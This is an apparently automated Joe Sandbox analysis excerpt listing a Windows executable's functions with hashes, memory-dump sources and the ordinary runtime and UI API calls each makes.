                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                                                                      • Instruction ID: b9e2a920327e2e300b450146c55f4534af932b7c18876076ab40d16e583870c4
                                                                                      • Opcode Fuzzy Hash: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                                                                      • Instruction Fuzzy Hash: E06222706047869FC719CF28C9805F9FBE1BF45308F15866ED8A687742D338E996CB89
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                                                                      • Instruction ID: 6f5b1dbf781e30d91f938b49252e420c8a3c85470b0c4bcd3299a691079ecf70
                                                                                      • Opcode Fuzzy Hash: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                                                                      • Instruction Fuzzy Hash: 285259B26047019FC758CF19C891A6AF7E1FFC8304F89892DF58697355D334E9198B86
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f96851dbf8ea0b2b86b77443680f696db59c6c82e85e1f28ded3cc7cdb2d9680
                                                                                      • Instruction ID: e032d804e6acf4d64e043022f72fea69207801ded6937ff826eeeb70bdeb067d
                                                                                      • Opcode Fuzzy Hash: f96851dbf8ea0b2b86b77443680f696db59c6c82e85e1f28ded3cc7cdb2d9680
                                                                                      • Instruction Fuzzy Hash: 4A12D3B16047068BC728DF28C9906F9B3E1FB55308F14892EE997C7A81D778E8D5CB49
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ece2fd13e2a1b1f5a1be01ed4d33fbf5013911ff3fcc67e35f8d7caac775effe
                                                                                      • Instruction ID: 622719d8a1a10a35974c9934b72fba85760963c559cd653b786935e945387f27
                                                                                      • Opcode Fuzzy Hash: ece2fd13e2a1b1f5a1be01ed4d33fbf5013911ff3fcc67e35f8d7caac775effe
                                                                                      • Instruction Fuzzy Hash: 00F189716083468FC724CE29C58496BBBE2FFC9714F144A2EF485A7395D738E9058B8E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                      • Instruction ID: 147d78a1515ad5d8c12ef591ffa6e2840d46d936d0abaa31ba9844ea94cd6117
                                                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                      • Instruction Fuzzy Hash: 96C1E6762050530ADB2D463995300BFBEA15E927B131A03BFD4B7CB2D4FE28D5AEC528
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                      • Instruction ID: ac58f7f8018d66a7f0788fad939229ef175f8f9987f175b2ab9d8b5b27ab65ed
                                                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                      • Instruction Fuzzy Hash: B8C1D6762091930ADB2D4639D4300BFBEA15A917B131A03BFD4B3CB2D5FE28D5AED518
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                      • Instruction ID: dd47947da822c77e595303fe618f9a3e618e10aea536a7bf079f06be5e16122e
                                                                                      • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                      • Instruction Fuzzy Hash: FDC1D7762050530ADF2D463995300BFBEA15AA17B131A03BFD8B7CB2D1FE28D5AED514
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                      • Instruction ID: 3e224d2f89dbc42940f28cbde2f34442bcd9805f04d32d669e3e16412bb561ab
                                                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                      • Instruction Fuzzy Hash: 52C1E5762050530ADF2D463AC5300BFBFA15AA17B130A07BFD8B6CB2D4FE28D5AAC514
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e504dd273049bafc7f0c901e4a6f642f893d111b001588ce11184cff821c1fd4
                                                                                      • Instruction ID: a2b5664e868fa41287ba6a6489a868971e3799b81f66d6990a2117180280fbf5
                                                                                      • Opcode Fuzzy Hash: e504dd273049bafc7f0c901e4a6f642f893d111b001588ce11184cff821c1fd4
                                                                                      • Instruction Fuzzy Hash: 66E128795093808FC344CF69D89086ABBF0AFDA300F49596EF9D5973A2C234E915CF66
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                      • Instruction ID: 244d674acbb38c77deb971580ce4003f415b56e3b292358df552db74092bc2b1
                                                                                      • Opcode Fuzzy Hash: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                      • Instruction Fuzzy Hash: 8D9179B02007498BDB24EF24DA94BFE77D5AB54304F10092FE596C72C2DBBC95A5C74A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0be99bfb04495bc4c7ebd387d24a70e01dfc56760af593cd131e7a5f01d29cbc
                                                                                      • Instruction ID: 1249433b07344169fa31d21dbc8f5dfd3480a860939a117a477193e62b87ecc1
                                                                                      • Opcode Fuzzy Hash: 0be99bfb04495bc4c7ebd387d24a70e01dfc56760af593cd131e7a5f01d29cbc
                                                                                      • Instruction Fuzzy Hash: 5761657170063872DA385E2ABB557FF6394AF12704FD4091BE842DF391C6DDAD82821E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
APIs
• ___free_lconv_mon.LIBCMT ref: 004295D1
  • Part of subcall function 0042916C: _free.LIBCMT ref: 00429189
  • Part of subcall function 0042916C: _free.LIBCMT ref: 0042919B
  • Part of subcall function 0042916C: _free.LIBCMT ref: 004291AD
  • Part of subcall function 0042916C: _free.LIBCMT ref: 004291BF
  • Part of subcall function 0042916C: _free.LIBCMT ref: 004291D1
  • Part of subcall function 0042916C: _free.LIBCMT ref: 004291E3
  • Part of subcall function 0042916C: _free.LIBCMT ref: 004291F5
  • Part of subcall function 0042916C: _free.LIBCMT ref: 00429207
  • Part of subcall function 0042916C: _free.LIBCMT ref: 00429219
  • Part of subcall function 0042916C: _free.LIBCMT ref: 0042922B
  • Part of subcall function 0042916C: _free.LIBCMT ref: 0042923D
  • Part of subcall function 0042916C: _free.LIBCMT ref: 0042924F
  • Part of subcall function 0042916C: _free.LIBCMT ref: 00429261
• _free.LIBCMT ref: 004295C6
  • Part of subcall function 004259C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?), ref: 004259D8
  • Part of subcall function 004259C2: GetLastError.KERNEL32(?,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?,?), ref: 004259EA
• _free.LIBCMT ref: 004295E8
• _free.LIBCMT ref: 004295FD
• _free.LIBCMT ref: 00429608
• _free.LIBCMT ref: 0042962A
• _free.LIBCMT ref: 0042963D
• _free.LIBCMT ref: 0042964B
• _free.LIBCMT ref: 00429656
• _free.LIBCMT ref: 0042968E
• _free.LIBCMT ref: 00429695
• _free.LIBCMT ref: 004296B2
• _free.LIBCMT ref: 004296CA
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
APIs
• GetWindow.USER32(?,00000005), ref: 0041B8DD
• GetClassNameW.USER32(00000000,?,00000800), ref: 0041B90C
  • Part of subcall function 00410B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0040AC49,?,?,?,0040ABF8,?,-00000002,?,00000000,?), ref: 00410B28
• GetWindowLongW.USER32(00000000,000000F0), ref: 0041B92A
• SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0041B941
• GetObjectW.GDI32(00000000,00000018,?), ref: 0041B954
  • Part of subcall function 00418B22: GetDC.USER32(00000000), ref: 00418B2E
  • Part of subcall function 00418B22: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00418B3D
  • Part of subcall function 00418B22: ReleaseDC.USER32(00000000,00000000), ref: 00418B4B
  • Part of subcall function 00418ADF: GetDC.USER32(00000000), ref: 00418AEB
  • Part of subcall function 00418ADF: GetDeviceCaps.GDI32(00000000,00000058), ref: 00418AFA
  • Part of subcall function 00418ADF: ReleaseDC.USER32(00000000,00000000), ref: 00418B08
• SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0041B97B
• DeleteObject.GDI32(00000000), ref: 0041B982
• GetWindow.USER32(00000000,00000002), ref: 0041B98B
Similarity
• API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
• String ID: STATIC
• API String ID: 1444658586-1882779555
APIs
• _free.LIBCMT ref: 0042623F
  • Part of subcall function 004259C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?), ref: 004259D8
  • Part of subcall function 004259C2: GetLastError.KERNEL32(?,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?,?), ref: 004259EA
• _free.LIBCMT ref: 0042624B
• _free.LIBCMT ref: 00426256
• _free.LIBCMT ref: 00426261
• _free.LIBCMT ref: 0042626C
• _free.LIBCMT ref: 00426277
• _free.LIBCMT ref: 00426282
• _free.LIBCMT ref: 0042628D
• _free.LIBCMT ref: 00426298
• _free.LIBCMT ref: 004262A6
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
Similarity
• API ID:
• String ID: ;%u$x%u$xc%u
• API String ID: 0-2277559157
APIs
  • Part of subcall function 004012E7: GetDlgItem.USER32(00000000,00003021), ref: 0040132B
  • Part of subcall function 004012E7: SetWindowTextW.USER32(00000000,004302E4), ref: 00401341
• EndDialog.USER32(?,00000001), ref: 004199AF
• SendMessageW.USER32(?,00000080,00000001,?), ref: 004199DC
• SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 004199F1
• SetWindowTextW.USER32(?,?), ref: 00419A02
• GetDlgItem.USER32(?,00000065), ref: 00419A0B
• SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00419A1F
• SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00419A31
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                      • String ID: LICENSEDLG
                                                                                      • API String ID: 3214253823-2177901306
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: __alldvrm$_strrchr
                                                                                      • String ID: N,B$N,B$N,B
                                                                                      • API String ID: 1036877536-2237543559
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00409232
                                                                                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00409255
                                                                                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00409274
                                                                                        • Part of subcall function 00410B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0040AC49,?,?,?,0040ABF8,?,-00000002,?,00000000,?), ref: 00410B28
                                                                                      • _swprintf.LIBCMT ref: 00409310
                                                                                        • Part of subcall function 00403F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00403F6E
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00409385
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 004093C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                      • String ID: rtmp%d
                                                                                      • API String ID: 2111052971-3303766350
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,00418705,?), ref: 00417FBA
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000003,00000000,00000000), ref: 00417FDB
                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00418002
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocByteCharCreateMultiStreamWide
                                                                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                      • API String ID: 4094277203-4209811716
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00417DAF
                                                                                      • GetTickCount.KERNEL32 ref: 00417DCD
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00417DE3
                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00417DF7
                                                                                      • TranslateMessage.USER32(?), ref: 00417E02
                                                                                      • DispatchMessageW.USER32(?), ref: 00417E0D
                                                                                      • ShowWindow.USER32(?,00000005,?,00000000,?,?,?,?,00000000,00000000,00000000,<html>,00000006), ref: 00417EBD
                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00417EC7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$CountTickWindow$DispatchPeekShowTextTranslate
                                                                                      • String ID:
                                                                                      • API String ID: 4150546248-0
                                                                                      APIs
                                                                                      • __aulldiv.LIBCMT ref: 0040FE33
                                                                                        • Part of subcall function 0040A8E0: GetVersionExW.KERNEL32(?), ref: 0040A905
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0040FE5C
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0040FE6E
                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0040FE7B
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040FE91
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040FE9D
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040FED3
                                                                                      • __aullrem.LIBCMT ref: 0040FF5D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                      • String ID:
                                                                                      • API String ID: 1247370737-0
                                                                                      APIs
                                                                                      • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0042CCE2,00000000,00000000,00000000,00000000,00000000,?), ref: 0042C5AF
                                                                                      • __fassign.LIBCMT ref: 0042C62A
                                                                                      • __fassign.LIBCMT ref: 0042C645
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0042C66B
                                                                                      • WriteFile.KERNEL32(?,00000000,00000000,0042CCE2,00000000,?,?,?,?,?,?,?,?,?,0042CCE2,00000000), ref: 0042C68A
                                                                                      • WriteFile.KERNEL32(?,00000000,00000001,0042CCE2,00000000,?,?,?,?,?,?,?,?,?,0042CCE2,00000000), ref: 0042C6C3
                                                                                      Memory Dump Source
